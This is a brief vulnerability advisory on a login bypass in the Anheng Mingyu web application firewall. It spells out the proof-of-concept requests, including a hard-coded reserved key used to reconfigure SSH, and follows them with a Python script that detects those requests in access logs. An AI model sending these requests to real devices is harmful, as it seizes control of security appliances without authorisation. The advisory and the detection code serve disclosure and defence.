Anheng Mingyu Web Application Firewall Report Php Any User Login Vulnerability
Vulnerability Description
The report.php file of the Anheng Mingyu WEB application firewall contains hard-coded settings for Console user login. An attacker can use this flaw to log in directly to the management backend.
Vulnerability Impact
Anheng Mingyu WEB application firewall
Network surveying and mapping
Vulnerability Reproduction
Login page
Verify POC
/report.m?a=rpc-timed
Then visit the main page; it redirects to the configuration page.
Send a request packet to configure system SSH, etc.
POST /system.m?a=reserved
key=!@#dbapp-waf-dev-reserved#@!
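For detection, the two request targets above can be searched for in access logs of whatever sits in front of the WAF management interface. The following is an added example, not part of the original post or the vendor's code; the combined log format, the sample lines, the 10-minute correlation window and the severity labels are assumptions, and the POST body (the key) is not visible in such logs, so only the request target is matched.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (assumption: taken from a
# proxy or tap in front of the WAF management interface).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 1820
198.51.100.7 - - [12/Mar/2024:10:02:11 +0000] "GET /report.m?a=rpc-timed HTTP/1.1" 200 0
198.51.100.7 - - [12/Mar/2024:10:02:15 +0000] "GET / HTTP/1.1" 302 0
198.51.100.7 - - [12/Mar/2024:10:02:40 +0000] "POST /system.m?a=reserved HTTP/1.1" 200 54
203.0.113.5 - - [12/Mar/2024:11:30:00 +0000] "GET /report.m?x=1&a=rpc-timed HTTP/1.1" 200 0
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# label -> (path, value of the "a" parameter), both taken from the page.
SIGNATURES = {"bypass": ("/report.m", "rpc-timed"), "reserved": ("/system.m", "reserved")}
WINDOW = timedelta(minutes=10)  # assumed correlation window

def classify(target):
    """Return 'bypass', 'reserved' or None for a request target."""
    parts = urlsplit(target)
    actions = parse_qs(parts.query).get("a", [])
    for label, (path, value) in SIGNATURES.items():
        if parts.path.lower() == path and value in actions:
            return label
    return None

def scan(log_text):
    """Return a list of (severity, ip, timestamp, target) for matching requests."""
    last_bypass = {}  # ip -> time of the latest report.m?a=rpc-timed request
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        kind = classify(m["target"]) if m else None
        if kind is None:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        severity = "medium"
        if kind == "bypass":
            last_bypass[m["ip"]] = ts
        elif m["ip"] in last_bypass and ts - last_bypass[m["ip"]] <= WINDOW:
            severity = "high"  # login bypass followed by a reserved config call
        findings.append((severity, m["ip"], m["ts"], m["target"]))
    return findings
```

Any hit on either target from outside the vendor's own maintenance hosts deserves review; the "high" case means the same client requested both within the window.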
This post is licensed under CC BY 4.0 by the author.